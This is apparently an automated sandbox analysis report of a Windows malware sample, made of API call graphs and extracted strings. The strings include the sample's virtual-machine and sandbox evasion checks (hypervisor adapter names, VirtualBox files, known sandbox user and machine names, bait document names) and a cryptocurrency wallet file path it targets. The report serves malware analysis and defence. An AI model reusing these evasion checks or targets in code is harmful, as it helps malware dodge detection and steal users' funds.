12772->12774 12781 d194d3 12773->12781 12775 d194e8 12774->12775 12776 d194fb 12775->12776 12777 d194ec 12775->12777 12780 d190a8 _unexpected 14 API calls 12776->12780 12779 d1b767 _unexpected 6 API calls 12777->12779 12778 d18f02 ___free_lconv_mon 14 API calls 12778->12784 12779->12781 12782 d19506 12780->12782 12781->12778 12783 d18f02 ___free_lconv_mon 14 API calls 12782->12783 12783->12784 12784->12736 12786 d17881 12785->12786 12787 d17878 12785->12787 12786->12748 12788 d17828 CallUnexpected 16 API calls 12787->12788 12789 d1787d 12788->12789 12789->12786 12790 d18d3f CallUnexpected 39 API calls 12789->12790 12791 d1788a 12790->12791 12793 d184f5 12792->12793 12801 d18506 12792->12801 12794 d15037 CallUnexpected GetModuleHandleW 12793->12794 12796 d184fa 12794->12796 12796->12801 12803 d185a9 GetModuleHandleExW 12796->12803 12798 d18544 12798->11644 12808 d18393 12801->12808 12804 d185e8 GetProcAddress 12803->12804 12807 d185fc 12803->12807 12804->12807 12805 d18618 12805->12801 12806 d1860f FreeLibrary 12806->12805 12807->12805 12807->12806 12809 d1839f ___scrt_is_nonwritable_in_current_image 12808->12809 12823 d195f4 EnterCriticalSection 12809->12823 12811 d183a9 12824 d183e0 12811->12824 12813 d183b6 12828 d183d4 12813->12828 12816 d1855f 12853 d18590 12816->12853 12818 d18569 12819 d1857d 12818->12819 12820 d1856d GetCurrentProcess TerminateProcess 12818->12820 12821 d185a9 CallUnexpected 3 API calls 12819->12821 12820->12819 12822 d18585 ExitProcess 12821->12822 12823->12811 12825 d183ec ___scrt_is_nonwritable_in_current_image CallUnexpected 12824->12825 12827 d18450 CallUnexpected 12825->12827 12831 d18acd 12825->12831 12827->12813 12852 d1963c LeaveCriticalSection 12828->12852 12830 d183c2 12830->12798 12830->12816 12832 d18ad9 __EH_prolog3 12831->12832 12835 d18825 12832->12835 12834 d18b00 CallUnexpected 12834->12827 12836 d18831 ___scrt_is_nonwritable_in_current_image 12835->12836 12843 d195f4 EnterCriticalSection 12836->12843 12838 d1883f 12844 d189dd 12838->12844 12843->12838 12845 d1884c 12844->12845 12846 d189fc 12844->12846 12848 d18874 12845->12848 12846->12845 12847 d18f02 ___free_lconv_mon 14 API calls 12846->12847 12847->12845 12851 d1963c LeaveCriticalSection 12848->12851 12850 d1885d 12850->12834 12851->12850 12852->12830 12856 d1a8af 12853->12856 12855 d18595 CallUnexpected 12855->12818 12857 d1a8be CallUnexpected 12856->12857 12858 d1a8cb 12857->12858 12860 d1b66a 12857->12860 12858->12855 12861 d1b5e5 _unexpected 5 API calls 12860->12861 12862 d1b686 12861->12862 12862->12858 12864 d18c7f 12863->12864 12866 d18c91 ___scrt_uninitialize_crt 12863->12866 12865 d18c8d 12864->12865 12868 d1bf9d 12864->12868 12865->11687 12866->11687 12871 d1be2e 12868->12871 12874 d1bd82 12871->12874 12875 d1bd8e ___scrt_is_nonwritable_in_current_image 12874->12875 12882 d195f4 EnterCriticalSection 12875->12882 12877 d1be04 12891 d1be22 12877->12891 12881 d1bd98 ___scrt_uninitialize_crt 12881->12877 12883 d1bcf6 12881->12883 12882->12881 12884 d1bd02 ___scrt_is_nonwritable_in_current_image 12883->12884 12894 d1c0ba EnterCriticalSection 12884->12894 12886 d1bd0c ___scrt_uninitialize_crt 12887 d1bd58 12886->12887 12895 d1bf38 12886->12895 12908 d1bd76 12887->12908 13010 d1963c LeaveCriticalSection 12891->13010 12893 d1be10 12893->12865 12894->12886 12896 d1bf4d CallUnexpected 12895->12896 12897 d1bf54 12896->12897 12898 d1bf5f 12896->12898 12899 d1be2e ___scrt_uninitialize_crt 68 API calls 12897->12899 12911 d1becf 12898->12911 12901 d1bf5a 12899->12901 12903 d177c3 CallUnexpected 39 API calls 12901->12903 12904 d1bf97 12903->12904 12904->12887 12906 d1bf80 12924 d1d0c0 12906->12924 13009 d1c0ce LeaveCriticalSection 12908->13009 12910 d1bd64 12910->12881 12912 d1bf0f 12911->12912 12913 d1bee8 12911->12913 12912->12901 12917 d1c717 12912->12917 12913->12912 12914 d1c717 ___scrt_uninitialize_crt 39 API calls 12913->12914 12915 d1bf04 12914->12915 12935 d1d8df 12915->12935 12918 d1c723 12917->12918 12919 d1c738 12917->12919 12920 d1980a ___free_lconv_mon 14 API calls 12918->12920 12919->12906 12921 d1c728 12920->12921 12922 d17a87 CallUnexpected 39 API calls 12921->12922 12923 d1c733 12922->12923 12923->12906 12925 d1d0d1 12924->12925 12926 d1d0de 12924->12926 12927 d1980a ___free_lconv_mon 14 API calls 12925->12927 12928 d1d127 12926->12928 12930 d1d105 12926->12930 12932 d1d0d6 12927->12932 12929 d1980a ___free_lconv_mon 14 API calls 12928->12929 12931 d1d12c 12929->12931 12976 d1d01e 12930->12976 12934 d17a87 CallUnexpected 39 API calls 12931->12934 12932->12901 12934->12932 12937 d1d8eb ___scrt_is_nonwritable_in_current_image 12935->12937 12936 d1d8f3 12936->12912 12937->12936 12938 d1d92c 12937->12938 12940 d1d972 12937->12940 12939 d17a0a CallUnexpected 39 API calls 12938->12939 12939->12936 12946 d1aa24 EnterCriticalSection 12940->12946 12942 d1d978 12943 d1d996 12942->12943 12947 d1d9f0 12942->12947 12973 d1d9e8 12943->12973 12946->12942 12948 d1da18 12947->12948 12971 d1da3b ___scrt_uninitialize_crt 12947->12971 12949 d1da1c 12948->12949 12951 d1da77 12948->12951 12950 d17a0a CallUnexpected 39 API calls 12949->12950 12950->12971 12952 d1da95 12951->12952 12954 d1e094 ___scrt_uninitialize_crt 41 API calls 12951->12954 12953 d1d56c ___scrt_uninitialize_crt 40 API calls 12952->12953 12955 d1daa7 12953->12955 12954->12952 12956 d1daf4 12955->12956 12957 d1daad 12955->12957 12960 d1db08 12956->12960 12961 d1db5d WriteFile 12956->12961 12958 d1dab5 12957->12958 12959 d1dadc 12957->12959 12968 d1d504 ___scrt_uninitialize_crt 6 API calls 12958->12968 12958->12971 12964 d1d13d ___scrt_uninitialize_crt 45 API calls 12959->12964 12962 d1db10 12960->12962 12963 d1db49 12960->12963 12965 d1db7f GetLastError 12961->12965 12961->12971 12966 d1db35 12962->12966 12967 d1db15 12962->12967 12969 d1d5e9 ___scrt_uninitialize_crt 7 API calls 12963->12969 12964->12971 12965->12971 12970 d1d7ad ___scrt_uninitialize_crt 8 API calls 12966->12970 12967->12971 12972 d1d6c4 ___scrt_uninitialize_crt 7 API calls 12967->12972 12968->12971 12969->12971 12970->12971 12971->12943 12972->12971 12974 d1aa47 ___scrt_uninitialize_crt LeaveCriticalSection 12973->12974 12975 d1d9ee 12974->12975 12975->12936 12977 d1d02a ___scrt_is_nonwritable_in_current_image 12976->12977 12989 d1aa24 EnterCriticalSection 12977->12989 12979 d1d039 12988 d1d07e 12979->12988 12990 d1aafb 12979->12990 12981 d1980a ___free_lconv_mon 14 API calls 12983 d1d085 12981->12983 12982 d1d065 FlushFileBuffers 12982->12983 12984 d1d071 GetLastError 12982->12984 13006 d1d0b4 12983->13006 13003 d197f7 12984->13003 12988->12981 12989->12979 12991 d1ab08 12990->12991 12993 d1ab1d 12990->12993 12992 d197f7 ___scrt_uninitialize_crt 14 API calls 12991->12992 12994 d1ab0d 12992->12994 12995 d197f7 ___scrt_uninitialize_crt 14 API calls 12993->12995 12997 d1ab42 12993->12997 12996 d1980a ___free_lconv_mon 14 API calls 12994->12996 12998 d1ab4d 12995->12998 12999 d1ab15 12996->12999 12997->12982 13000 d1980a ___free_lconv_mon 14 API calls 12998->13000 12999->12982 13001 d1ab55 13000->13001 13002 d17a87 CallUnexpected 39 API calls 13001->13002 13002->12999 13004 d193cb ___free_lconv_mon 14 API calls 13003->13004 13005 d197fc 13004->13005 13005->12988 13007 d1aa47 ___scrt_uninitialize_crt LeaveCriticalSection 13006->13007 13008 d1d09d 13007->13008 13008->12932 13009->12910 13010->12893 13011 bd9240 GetUserDefaultLangID 13012 bd92ec ExitProcess 13011->13012 13013 bd925d 13011->13013 13013->13012 13027 bd89f0 13013->13027 13015 bd92ca 13015->13012 13016 bd92ce 13015->13016 13107 bd8710 InitializeCriticalSection 13016->13107 13018 bd92d3 13117 bd72e0 13018->13117 13026 bd92e7 13026->13012 13028 bd89fd 13027->13028 13029 bd8a12 EnumDisplayDevicesW 13028->13029 13030 bd8aaa GetModuleHandleA GetProcAddress GetProcAddress 13029->13030 13031 bd8a3a 13029->13031 13032 bd8adc 13030->13032 13033 bd8ae2 ExpandEnvironmentStringsW ExpandEnvironmentStringsW GetFileAttributesW 13030->13033 13034 bd8a40 StrStrIW 13031->13034 13032->13033 13035 bd8b4a SHGetFolderPathW SHGetFolderPathW PathCombineW GetFileAttributesW 13033->13035 13036 bd8b22 13033->13036 13037 bd8a57 StrStrIW 13034->13037 13038 bd8b41 13034->13038 13047 bd8ba2 13035->13047 13036->13035 13039 bd8b26 GetFileAttributesW 13036->13039 13037->13038 13041 bd8a6d StrStrIW 13037->13041 13038->13015 13039->13035 13042 bd8b34 13039->13042 13041->13038 13043 bd8a83 StrStrIW 13041->13043 13042->13035 13045 bd8b38 13042->13045 13043->13038 13046 bd8a99 EnumDisplayDevicesW 13043->13046 13044 bd8bd1 PathCombineW GetFileAttributesW 13044->13047 13045->13038 13046->13030 13046->13034 13047->13038 13047->13044 13048 bd8c15 13047->13048 13048->13038 13049 bd8c1e PathCombineW PathCombineW GetFileAttributesW 13048->13049 13050 bd8c6c 13049->13050 13051 bd8e02 PathCombineW GetFileAttributesW 13049->13051 13050->13051 13054 bd8c74 GetFileAttributesW 13050->13054 13052 bd8e2d 13051->13052 13053 bd8ee9 ExpandEnvironmentStringsW GetFileAttributesW 13051->13053 13052->13053 13057 bd8e35 CreateFileW 13052->13057 13055 bd8f0e 13053->13055 13056 bd8f33 GetComputerNameW GetUserNameW KiUserCallbackDispatcher GetSystemMetrics 13053->13056 13054->13051 13058 bd8c86 13054->13058 13055->13056 13059 bd8f12 GetFileAttributesExW 13055->13059 13061 bd8fb0 lstrcmpW 13056->13061 13060 bd8e5d GetFileSize GetProcessHeap HeapAlloc 13057->13060 13078 bd8e98 13057->13078 13058->13051 13062 bd8c8e CreateFileW 13058->13062 13059->13056 13063 bd8f29 13059->13063 13064 bd8e7e ReadFile 13060->13064 13065 bd8e91 CloseHandle 13060->13065 13061->13038 13066 bd8fc8 13061->13066 13067 bd8d09 CreateFileW 13062->13067 13068 bd8cc5 GetFileSize GetProcessHeap HeapAlloc 13062->13068 13063->13038 13063->13056 13064->13065 13065->13078 13066->13061 13070 bd8fcf StrStrW 13066->13070 13069 bd8d32 GetFileSize GetProcessHeap HeapAlloc 13067->13069 13086 bd8d70 13067->13086 13071 bd8cfc CloseHandle 13068->13071 13072 bd8ce7 ReadFile 13068->13072 13075 bd8d69 CloseHandle 13069->13075 13076 bd8d54 ReadFile 13069->13076 13070->13038 13077 bd8fe9 lstrcmpW 13070->13077 13071->13067 13072->13071 13073 bd8ed9 13073->13038 13073->13053 13074 bd8ec9 GetProcessHeap HeapFree 13074->13073 13075->13086 13076->13075 13079 bd900e 13077->13079 13080 bd8ffb lstrcmpW 13077->13080 13078->13073 13078->13074 13083 bd9025 lstrcmpW 13079->13083 13087 bd9041 GlobalMemoryStatusEx 13079->13087 13080->13038 13080->13079 13081 bd8de3 13084 bd8df8 13081->13084 13085 bd8df0 GetProcessHeap HeapFree 13081->13085 13082 bd8dd3 GetProcessHeap HeapFree 13082->13081 13083->13038 13083->13079 13084->13038 13084->13051 13085->13084 13086->13081 13086->13082 13087->13038 13088 bd9074 lstrcmpW 13087->13088 13089 bd9086 lstrcmpW 13088->13089 13090 bd9095 13088->13090 13089->13090 13090->13038 13091 bd90e4 PathCombineW 13090->13091 13093 bd90ba lstrcmpW 13090->13093 13092 bd9100 13091->13092 13092->13092 13094 bd9110 FindFirstFileW 13092->13094 13093->13091 13095 bd90cc 13093->13095 13096 bd920b GetModuleFileNameW StrStrIW 13094->13096 13097 bd9130 13094->13097 13095->13038 13095->13091 13096->13015 13098 bd9134 lstrcmpW 13097->13098 13099 bd914a lstrcmpW 13098->13099 13100 bd91e5 FindNextFileW 13098->13100 13099->13100 13105 bd9160 13099->13105 13100->13098 13101 bd91fb FindClose 13100->13101 13101->13038 13101->13096 13102 bd918b lstrcmpW 13103 bd919f lstrcmpW 13102->13103 13102->13105 13104 bd91ab lstrcmpW 13103->13104 13103->13105 13104->13105 13106 bd91b7 lstrcmpW 13104->13106 13105->13100 13105->13102 13106->13105 13108 bd8743 GetVolumeInformationW StringFromGUID2 wsprintfA CreateMutexW GetLastError 13107->13108 13185 bd71a0 13107->13185 13110 bd87ff 13108->13110 13111 bd88f1 ExitProcess 13108->13111 13193 bd26b0 GetTickCount 13110->13193 13113 bd8804 WSAStartup CryptAcquireContextA 13114 bd884f CryptAcquireContextA 13113->13114 13116 bd886f 13113->13116 13114->13111 13114->13116 13115 bd88a1 CoInitializeEx ExpandEnvironmentStringsW CreateFileW 13115->13018 13116->13115 13116->13116 13195 bd9740 13117->13195 13120 bd732c ExpandEnvironmentStringsW 13121 bd733f GetSystemWow64DirectoryW 13120->13121 13122 bd735b wnsprintfW ExpandEnvironmentStringsW wnsprintfW 13121->13122 13123 bd7355 GetLastError 13121->13123 13197 bd6d50 VariantInit CoCreateInstance 13122->13197 13123->13122 13126 bd7419 NetApiBufferFree 13127 bd74f1 13126->13127 13128 bd742f 13126->13128 13135 bd93a0 CryptGenRandom 13127->13135 13233 bd94a0 8 API calls 13128->13233 13131 bd745c wsprintfW CoGetObject 13132 bd74b3 13131->13132 13132->13127 13134 bd74eb CoUninitialize 13132->13134 13134->13127 13136 bd93dc 13135->13136 13248 bd2850 GetProcessHeap HeapAlloc 13136->13248 13139 bd941e 13141 bd2850 2 API calls 13139->13141 13140 bd9412 GetProcessHeap HeapFree 13140->13139 13142 bd942d 13141->13142 13143 bd92dd 13142->13143 13144 bd9436 wsprintfA 13142->13144 13148 bd7920 GetPEB LsaOpenPolicy 13143->13148 13145 bd9461 13144->13145 13147 bd947f GetProcessHeap HeapFree GetProcessHeap HeapFree 13145->13147 13250 bd6830 ObtainUserAgentString MultiByteToWideChar 13145->13250 13147->13143 13149 bd796c LsaQueryInformationPolicy 13148->13149 13150 bd79ea GetComputerNameW GetUserNameW WideCharToMultiByte 13148->13150 13153 bd797f 13149->13153 13154 bd79e1 LsaClose 13149->13154 13151 bd7a3b 13150->13151 13152 bd7a44 GetProcessHeap HeapAlloc 13150->13152 13157 bd7a7f WideCharToMultiByte 13151->13157 13152->13151 13158 bd7a5a WideCharToMultiByte 13152->13158 13155 bd79da LsaFreeMemory 13153->13155 13156 bd7987 GetProcessHeap HeapAlloc 13153->13156 13154->13150 13155->13154 13161 bd79a0 13156->13161 13159 bd7aa9 GetProcessHeap HeapAlloc 13157->13159 13163 bd7aa0 13157->13163 13158->13157 13160 bd7abd WideCharToMultiByte 13159->13160 13159->13163 13160->13163 13161->13155 13162 bd26b0 GetTickCount 13162->13163 13163->13162 13164 bd7b2a 13163->13164 13165 bd7b39 wsprintfA wsprintfA 13164->13165 13166 bd7b8e 13165->13166 13167 bd6830 32 API calls 13166->13167 13168 bd7bc4 13167->13168 13169 bd7bdf 13168->13169 13170 bd7bd7 GetProcessHeap HeapFree 13168->13170 13171 bd7bee 13169->13171 13172 bd7be6 GetProcessHeap HeapFree 13169->13172 13170->13169 13173 bd7bfd 13171->13173 13174 bd7bf5 GetProcessHeap HeapFree 13171->13174 13172->13171 13175 bd7c09 13173->13175 13176 bd7c01 GetProcessHeap HeapFree 13173->13176 13174->13173 13177 bd8900 ExpandEnvironmentStringsW ExpandEnvironmentStringsW ExpandEnvironmentStringsW 13175->13177 13176->13175 13178 bd8950 13177->13178 13178->13178 13179 bd8960 GetFileAttributesW 13178->13179 13180 bd897f GetFileAttributesW 13179->13180 13181 bd8974 13179->13181 13182 bd89a3 wnsprintfW ShellExecuteW 13180->13182 13184 bd8978 13180->13184 13181->13180 13181->13184 13182->13026 13183 bd8996 lstrcpyW 13183->13182 13184->13182 13184->13183 13186 bd71b1 RegOpenKeyExW 13185->13186 13187 bd722f 13186->13187 13188 bd71d4 RegQueryValueExW 13186->13188 13187->13186 13192 bd7246 13187->13192 13189 bd7226 RegCloseKey 13188->13189 13190 bd71f0 GetProcessHeap HeapAlloc 13188->13190 13189->13187 13190->13189 13191 bd720c RegQueryValueExW 13190->13191 13191->13189 13192->13108 13194 bd26c0 13193->13194 13194->13113 13194->13194 13196 bd72ed ExpandEnvironmentStringsW ExpandEnvironmentStringsW lstrlenW 13195->13196 13196->13120 13196->13121 13198 bd6dab 13197->13198 13205 bd6dfa 13197->13205 13199 bd6ddc SysAllocString 13198->13199 13198->13205 13199->13205 13200 bd6e1d SysFreeString 13201 bd6e20 13200->13201 13202 bd6e2a SysAllocString 13201->13202 13203 bd7168 SetFileAttributesW lstrcpyW GetUserNameW NetUserGetInfo 13201->13203 13204 bd6e4d SysFreeString 13202->13204 13203->13126 13203->13127 13206 bd6e7d 13204->13206 13207 bd6e5d SysAllocString 13204->13207 13205->13200 13205->13201 13208 bd6e81 SysAllocString 13206->13208 13211 bd6e99 13206->13211 13209 bd6e74 SysFreeString 13207->13209 13210 bd6e96 SysFreeString 13208->13210 13209->13206 13210->13211 13211->13203 13212 bd6ecf SysAllocString 13211->13212 13215 bd6f07 13211->13215 13213 bd6ee2 SysFreeString SysAllocString 13212->13213 13214 bd6ef8 SysFreeString 13213->13214 13214->13215 13216 bd6f49 SysAllocString 13215->13216 13220 bd6f6b 13215->13220 13217 bd6f5c SysFreeString 13216->13217 13217->13220 13218 bd70cd 13218->13203 13222 bd70f6 VariantInit SysAllocString SysAllocString 13218->13222 13219 bd6fca SysAllocString 13221 bd6fdd SysFreeString SysAllocString 13219->13221 13220->13219 13227 bd702d 13220->13227 13223 bd6ff3 SysFreeString 13221->13223 13224 bd7158 SysFreeString VariantClear 13222->13224 13226 bd700a 13223->13226 13224->13203 13225 bd709e SysAllocString 13229 bd70b1 SysFreeString 13225->13229 13226->13227 13228 bd700e SysAllocString 13226->13228 13227->13218 13227->13225 13231 bd7021 SysFreeString 13228->13231 13229->13218 13230 bd70bb SysAllocString 13229->13230 13232 bd70ca SysFreeString 13230->13232 13231->13227 13232->13218 13234 bd950d 13233->13234 13247 bd7434 CoInitializeEx lstrlenW 13233->13247 13235 bd9529 GetCurrentProcessId OpenProcess 13234->13235 13234->13247 13236 bd9548 ReadProcessMemory 13235->13236 13235->13247 13238 bd9572 ReadProcessMemory 13236->13238 13236->13247 13239 bd958c GetWindowsDirectoryW StrNCatW VirtualAlloc lstrcpyW 13238->13239 13238->13247 13240 bd95e3 GetModuleFileNameW 13239->13240 13242 bd9630 ReadProcessMemory 13240->13242 13243 bd9647 ReadProcessMemory 13242->13243 13242->13247 13244 bd9662 13243->13244 13243->13247 13244->13242 13245 bd9679 CloseHandle StrCmpIW 13244->13245 13245->13247 13247->13131 13247->13132 13249 bd288c 13248->13249 13249->13139 13249->13140 13251 bd687a 13250->13251 13252 bd6881 GetProcessHeap HeapAlloc 13250->13252 13279 bd6670 13251->13279 13252->13251 13253 bd689f MultiByteToWideChar 13252->13253 13253->13251 13255 bd68c5 13256 bd68c7 InternetOpenW 13255->13256 13257 bd6910 InternetSetOptionW 13255->13257 13258 bd6a77 13255->13258 13256->13255 13257->13257 13259 bd6927 InternetConnectW 13257->13259 13260 bd6a8a GetProcessHeap HeapFree 13258->13260 13261 bd6a92 13258->13261 13262 bd6a59 InternetCloseHandle 13259->13262 13263 bd694b HttpOpenRequestW 13259->13263 13260->13261 13264 bd6a99 GetProcessHeap HeapFree 13261->13264 13265 bd6aa1 13261->13265 13262->13255 13262->13258 13266 bd6a4d 13263->13266 13267 bd6981 InternetQueryOptionW 13263->13267 13264->13265 13268 bd6aa8 GetProcessHeap HeapFree 13265->13268 13269 bd6ab0 13265->13269 13270 bd6a53 InternetCloseHandle 13266->13270 13271 bd69ba HttpSendRequestW 13267->13271 13272 bd69a4 InternetSetOptionW 13267->13272 13268->13269 13269->13145 13270->13262 13273 bd6a42 InternetCloseHandle 13271->13273 13277 bd69d2 13271->13277 13272->13271 13273->13270 13274 bd69d4 InternetQueryDataAvailable 13274->13277 13275 bd6a09 GetProcessHeap HeapReAlloc 13278 bd6a19 InternetReadFile 13275->13278 13276 bd69f8 GetProcessHeap HeapAlloc 13276->13278 13277->13273 13277->13274 13277->13275 13277->13276 13278->13277 13280 bd6680 InternetCrackUrlW 13279->13280 13282 bd677e 13280->13282 13283 bd66e3 GetProcessHeap HeapAlloc 13280->13283 13282->13255 13283->13282 13285 bd670c GetProcessHeap HeapAlloc 13283->13285 13285->13282

                    Executed Functions

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 0 bd89f0-bd8a00 call bd9740 3 bd8a02-bd8a10 0->3 3->3 4 bd8a12-bd8a38 EnumDisplayDevicesW 3->4 5 bd8aaa-bd8ada GetModuleHandleA GetProcAddress * 2 4->5 6 bd8a3a 4->6 7 bd8adc-bd8adf 5->7 8 bd8ae2-bd8b20 ExpandEnvironmentStringsW * 2 GetFileAttributesW 5->8 9 bd8a40-bd8a51 StrStrIW 6->9 7->8 10 bd8b4a-bd8b4c 8->10 11 bd8b22-bd8b24 8->11 12 bd8a57-bd8a67 StrStrIW 9->12 13 bd8b41-bd8b49 9->13 15 bd8b4e 10->15 16 bd8b53-bd8ba0 SHGetFolderPathW * 2 PathCombineW GetFileAttributesW 10->16 11->10 14 bd8b26-bd8b32 GetFileAttributesW 11->14 12->13 17 bd8a6d-bd8a7d StrStrIW 12->17 14->10 18 bd8b34-bd8b36 14->18 15->16 20 bd8ba6-bd8bce 16->20 21 bd8ba2-bd8ba4 16->21 17->13 19 bd8a83-bd8a93 StrStrIW 17->19 18->10 23 bd8b38-bd8b3a 18->23 19->13 24 bd8a99-bd8aa8 EnumDisplayDevicesW 19->24 22 bd8bd1-bd8bf7 PathCombineW GetFileAttributesW 20->22 21->13 21->20 25 bd8bf9-bd8bfb 22->25 26 bd8c01 22->26 23->13 27 bd8b3c 23->27 24->5 24->9 25->26 28 bd8bfd-bd8bff 25->28 29 bd8c03-bd8c13 26->29 27->13 28->29 29->22 30 bd8c15-bd8c18 29->30 30->13 31 bd8c1e-bd8c66 PathCombineW * 2 GetFileAttributesW 30->31 32 bd8c6c-bd8c6e 31->32 33 bd8e02-bd8e27 PathCombineW GetFileAttributesW 31->33 32->33 36 bd8c74-bd8c80 GetFileAttributesW 32->36 34 bd8e2d-bd8e2f 33->34 35 bd8ee9-bd8f0c ExpandEnvironmentStringsW GetFileAttributesW 33->35 34->35 39 bd8e35-bd8e5b CreateFileW 34->39 37 bd8f0e-bd8f10 35->37 38 bd8f33-bd8fac GetComputerNameW GetUserNameW KiUserCallbackDispatcher GetSystemMetrics 35->38 36->33 40 bd8c86-bd8c88 36->40 37->38 41 bd8f12-bd8f27 GetFileAttributesExW 37->41 44 bd8fb0-bd8fc2 lstrcmpW 38->44 42 bd8e5d-bd8e7c GetFileSize GetProcessHeap HeapAlloc 39->42 43 bd8e98-bd8e9f 39->43 40->33 45 bd8c8e-bd8cc3 CreateFileW 40->45 41->38 46 bd8f29-bd8f2d 41->46 47 bd8e7e-bd8e8e ReadFile 42->47 48 bd8e91-bd8e92 CloseHandle 42->48 50 bd8ec5-bd8ec7 43->50 51 bd8ea1-bd8eac 43->51 44->13 49 bd8fc8-bd8fcd 44->49 52 bd8d09-bd8d30 CreateFileW 45->52 53 bd8cc5-bd8ce5 GetFileSize GetProcessHeap HeapAlloc 45->53 46->13 46->38 47->48 48->43 49->44 56 bd8fcf-bd8fe3 StrStrW 49->56 60 bd8ed9-bd8edd 50->60 61 bd8ec9-bd8ed3 GetProcessHeap HeapFree 50->61 57 bd8eb0-bd8ebb 51->57 54 bd8d70-bd8d78 52->54 55 bd8d32-bd8d52 GetFileSize GetProcessHeap HeapAlloc 52->55 58 bd8cfc-bd8d03 CloseHandle 53->58 59 bd8ce7-bd8cf9 ReadFile 53->59 65 bd8d7a-bd8d7e 54->65 66 bd8dc6-bd8dd1 54->66 63 bd8d69-bd8d6a CloseHandle 55->63 64 bd8d54-bd8d66 ReadFile 55->64 56->13 67 bd8fe9-bd8ff9 lstrcmpW 56->67 57->50 68 bd8ebd-bd8ebf 57->68 58->52 59->58 60->13 62 bd8ee3 60->62 61->60 62->35 63->54 64->63 65->66 69 bd8d80-bd8d8f 65->69 73 bd8de3 66->73 74 bd8dd3-bd8de1 GetProcessHeap HeapFree 66->74 70 bd900e-bd901e 67->70 71 bd8ffb-bd9008 lstrcmpW 67->71 68->57 72 bd8ec1 68->72 75 bd8d90-bd8d9c 69->75 76 bd9025-bd9034 lstrcmpW 70->76 71->13 71->70 72->50 77 bd8de9-bd8dee 73->77 74->77 75->66 80 bd8d9e-bd8da0 75->80 76->13 81 bd903a-bd903f 76->81 78 bd8df8-bd8dfc 77->78 79 bd8df0-bd8df6 GetProcessHeap HeapFree 77->79 78->13 78->33 79->78 80->75 82 bd8da2-bd8daf 80->82 81->76 83 bd9041-bd906e GlobalMemoryStatusEx 81->83 84 bd8db1-bd8dbc 82->84 83->13 85 bd9074-bd9084 lstrcmpW 83->85 84->66 88 bd8dbe-bd8dc0 84->88 86 bd9086-bd9093 lstrcmpW 85->86 87 bd90a1-bd90a8 85->87 86->87 89 bd9095-bd909b 86->89 90 bd90aa-bd90b0 87->90 91 bd90e4-bd90ff PathCombineW 87->91 88->84 92 bd8dc2 88->92 89->13 89->87 90->91 93 bd90b2-bd90b8 90->93 94 bd9100-bd910e 91->94 92->66 93->91 95 bd90ba-bd90ca lstrcmpW 93->95 94->94 96 bd9110-bd912a FindFirstFileW 94->96 95->91 97 bd90cc-bd90d0 95->97 98 bd920b-bd923c GetModuleFileNameW StrStrIW 96->98 99 bd9130-bd9132 96->99 97->91 100 bd90d2-bd90d9 97->100 101 bd9134-bd9144 lstrcmpW 99->101 100->100 102 bd90db-bd90de 100->102 103 bd914a-bd915a lstrcmpW 101->103 104 bd91e5-bd91f5 FindNextFileW 101->104 102->13 102->91 103->104 106 bd9160-bd9172 103->106 104->101 105 bd91fb-bd9205 FindClose 104->105 105->13 105->98 107 bd918b-bd919d lstrcmpW 106->107 108 bd9174-bd9189 106->108 109 bd919f-bd91a9 lstrcmpW 107->109 110 bd91c3-bd91d1 107->110 108->107 108->108 109->110 111 bd91ab-bd91b5 lstrcmpW 109->111 112 bd91d3-bd91dd 110->112 113 bd91e2 110->113 111->110 114 bd91b7-bd91c1 lstrcmpW 111->114 112->104 115 bd91df-bd91e0 112->115 113->104 114->110 114->113 115->104
                    APIs
                    • EnumDisplayDevicesW.USER32(00000000,00000000,00000000,00000000), ref: 00BD8A2E
                    • StrStrIW.KERNELBASE(?,Hyper-V), ref: 00BD8A4D
                    • StrStrIW.SHLWAPI(?,VMWare), ref: 00BD8A63
                    • StrStrIW.SHLWAPI(?,Parallels Display Adapter), ref: 00BD8A79
                    • StrStrIW.SHLWAPI(?,Red Hat), ref: 00BD8A8F
                    • EnumDisplayDevicesW.USER32(00000000,00000001,00000348,00000000), ref: 00BD8AA4
                    • GetModuleHandleA.KERNEL32(kernel32), ref: 00BD8AAF
                    • GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 00BD8AC3
                    • GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 00BD8ACD
                    • ExpandEnvironmentStringsW.KERNEL32(%systemroot%\System32\VBoxService.exe,?,00000104), ref: 00BD8AF9
                    • ExpandEnvironmentStringsW.KERNEL32(%systemroot%\System32\VBoxTray.exe,?,00000104), ref: 00BD8B0C
                    • GetFileAttributesW.KERNELBASE(?), ref: 00BD8B1B
                    • GetFileAttributesW.KERNEL32(?), ref: 00BD8B2D
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1171905902.0000000000BD1000.00000020.00001000.00020000.00000000.sdmp, Offset: 00BD0000, based on PE: true
                    • Associated: 00000000.00000002.1171894565.0000000000BD0000.00000002.00001000.00020000.00000000.sdmpDownload File
                    • Associated: 00000000.00000002.1171919051.0000000000BDB000.00000002.00001000.00020000.00000000.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_bd0000_SecuriteInfo.jbxd
                    Yara matches
                    Similarity
                    • API ID: AddressAttributesDevicesDisplayEnumEnvironmentExpandFileProcStrings$HandleModule
                    • String ID: %appdata%\Jaxx\Local Storage\wallet.dat$%systemroot%\System32\VBoxService.exe$%systemroot%\System32\VBoxTray.exe$7$@$ANNA-PC$Admin$Anna$Are.docx$BAIT$Bruno$DESKTOP-ET51AJO$FORTI-PC$Files.docx$Harry Johnson$Hyper-V$Jennifer Lopez & Pitbull - On The FloorBeyonce - Halo$Joe Cage$OpenVPN.txt$Opened.docx$Puser$Parallels Display Adapter$Paul user$Recently.docx$Red Hat$Resource.txt$SFTOR-PC$STRAZNJICA.GRUBUTT$These.docx$VMWare$WDAGUtilityAccount$WILLCARTER-PC$Wow64DisableWow64FsRedirection$Wow64RevertWow64FsRedirection$d5.vc/g$doc$docx$kernel32$new songs.txt$powershell.exe$sal.rosenburg$xls$xlsx
                    • API String ID: 4266617301-1597041734
                    • Opcode ID: 94a154308ba907dc8ec8a6c41cfdf37490471045dc4ffdfd1e0a1bfae65a86f1
                    • Instruction ID: fcd3d2f54668332e51646874815b6e57a59dc76c884b1819c48e1cb4720b553d
                    • Opcode Fuzzy Hash: 94a154308ba907dc8ec8a6c41cfdf37490471045dc4ffdfd1e0a1bfae65a86f1
                    • Instruction Fuzzy Hash: 0B327F71900219AADF209BA4CC89FEEF7ECEF14715F0505A7E518F3290FB749A458B64

                    Control-flow Graph

                    • Executed
